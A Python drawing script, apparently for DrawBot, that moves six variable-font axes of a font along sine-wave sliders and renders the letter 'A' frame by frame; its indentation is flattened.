#### File: traversing_designspaces/6axes_code/sliders_sinus_varA_6axes.py
```python
import sys
sys.path.append("..")
from helper_functions import *
# --------------------------
# settings
pw = ph = 500
axis_l = 420
dot_s = 10
steps = 60
margin = (pw - axis_l)/2
font_name = '../fonts/varA.ttf'
selected_axes = [ 'ANLE', 'ANRI', 'WELE', 'WERI', 'WECE', 'HECE' ]
axes = { axis : listFontVariations(font_name)[axis] for axis in selected_axes }
angle = pi/len(axes)
cols = [
(22/255, 96/255, 168/255, .75),
(1, 106/255, 0, .75),
(34/255, 149/255, 26/255, .75),
(205/255, 12/255, 25/255, .75),
(129/255, 76/255, 177/255, .75),
(122/255, 67/255, 57/255, .75)
]
# ------------------------------------
# functions
def base_chart(axes, l, web = False):
for a, axis in enumerate(axes):
fill(None)
strokeWidth(.5)
stroke( * cols[a])
y = a * l/(len(axes)-1)
line( (0, y), (axis_l, y))
stroke(None)
fill(0)
text('%.3f' % axes[axis]['minValue'], (0, y + dot_s/2))
text('%.3f' % axes[axis]['maxValue'], (axis_l, y + dot_s/2), align ='right')
text('%s' % axes[axis]['name'], (0, y - dot_s))
def base_page():
newPage(pw, ph)
fill(1)
rect(0, 0, pw, ph)
translate(margin, margin)
base_chart(axes, axis_l)
stroke(None)
fill(0)
# ------------------------------------
# drawings
all_polys = []
for st in range(steps):
# newDrawing()
base_page()
factor = st / steps
vals = []
for a, axis in enumerate(axes):
x = axis_l/2 + cos(pi*2 * factor + a * pi/len(axes)) * axis_l/2
fill( *cols[a] )
vals.append(x)
oval(x - dot_s/2, a * (axis_l/(len(axes)-1))- dot_s/2, dot_s, dot_s)
var_values = { axis : map_val(vals[a], 0, axis_l, axes[axis]['minValue'], axes[axis]['maxValue']) for a, axis in enumerate(axes) }
fontVariations(**var_values)
fill(0, .05)
fill(None)
stroke(0, .25)
strokeWidth(1)
font(font_name)
fontSize(pw/4)
fill(0)
stroke(None)
text('A', (pw/3, ph/3))
# saveImage('~/Desktop/imgs/%.3d.png' % st)
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.